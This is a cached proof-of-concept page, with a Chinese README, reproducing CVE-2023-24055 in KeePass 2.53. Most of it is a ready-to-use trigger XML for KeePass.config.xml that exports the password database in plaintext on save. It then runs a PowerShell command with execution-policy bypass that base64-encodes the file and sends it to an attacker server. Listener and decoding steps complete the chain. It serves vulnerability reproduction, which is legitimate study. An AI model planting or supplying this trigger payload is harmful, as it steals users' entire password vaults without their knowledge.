Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-24055 PoC — KeePass 安全漏洞

Source
https://github.com/zwlsix/KeePass-CVE-2023-24055
Associated Vulnerability
Title:KeePass 安全漏洞 (CVE-2023-24055)
Description:KeePass是一款开源的密码管理器。 KeePass 2.53版本及之前版本存在安全漏洞。攻击者利用该漏洞通过添加导出触发器获取明文密码。
Description
KeePass CVE-2023-24055复现
Readme
# KeePass-CVE-2023-24055
KeePass CVE-2023-24055复现
KeePass CVE-2023-24055复现


1,准备机器:kali(192.168.232.129),windows10(192.168.232.128)

2,keepass版本:2.53


![图片1](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%871.png)


2,原理:通过修改keepass配置文件KeePass.config.xml,添加触发器配置项:导出明文密码并上传到攻击者服务器上;添加触发器的xml代码如下:

其中:`<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>`字段为设置导出明文密码的本机路径


使用powershell用get方法传输密码文件

```
<Parameter>PowerShell.exe</Parameter>
<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
```


```
<Triggers>
				<Trigger>
					<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
					<Name>exploit</Name>
					<Events>
						<Event>
							<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
							<Parameters>
								<Parameter>0</Parameter>
								<Parameter />
							</Parameters>
						</Event>
					</Events>
					<Conditions />
					<Actions>
						<Action>
							<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
							<Parameters>
								<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>
								<Parameter>KeePass XML (2.x)</Parameter>
								<Parameter />
								<Parameter />
							</Parameters>
						</Action>
						<Action>
							<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
							<Parameters>
								<Parameter>PowerShell.exe</Parameter>
								<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
								<Parameter>False</Parameter>
								<Parameter>1</Parameter>
								<Parameter />
							</Parameters>
						</Action>
					</Actions>
				</Trigger>
			</Triggers>
```

3,修改文件KeePass.config.xml,添加xml配置项并保存(添加位置:`<TriggerSystem></TriggerSystem>`标签内),打开keepass验证是否添加成功:


![tu2](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%872.png)

4,打开kali使用命令python3 -m http.server 8888开启web服务用以接收导出的密码铭文

![tu3](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%873.png)

5,打开keepass新建一个记录并保存,触发器被触发,查看kali接收的内容:

![tu4](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%874.png)


6,复制内容到文件,并使用base64进行解码,即得到明文密码

![tu5](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%875.png)


![tu6](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%876.png)
   









参考文章:https://github.com/alt3kx/CVE-2023-24055_PoC

https://www.youtube.com/watch?v=tqK1bns51ek
File Snapshot

 [4.0K]  /data/pocs/e20d04e9f387cf79d60c0436c20675a8a8e81928
├── [4.0K]  image
│   ├── [ 21K]  图片1.png
│   ├── [ 17K]  图片2.png
│   ├── [6.2K]  图片3.png
│   ├── [187K]  图片4.png
│   ├── [3.7K]  图片5.png
│   └── [ 37K]  图片6.png
└── [3.1K]  README.md

1 directory, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.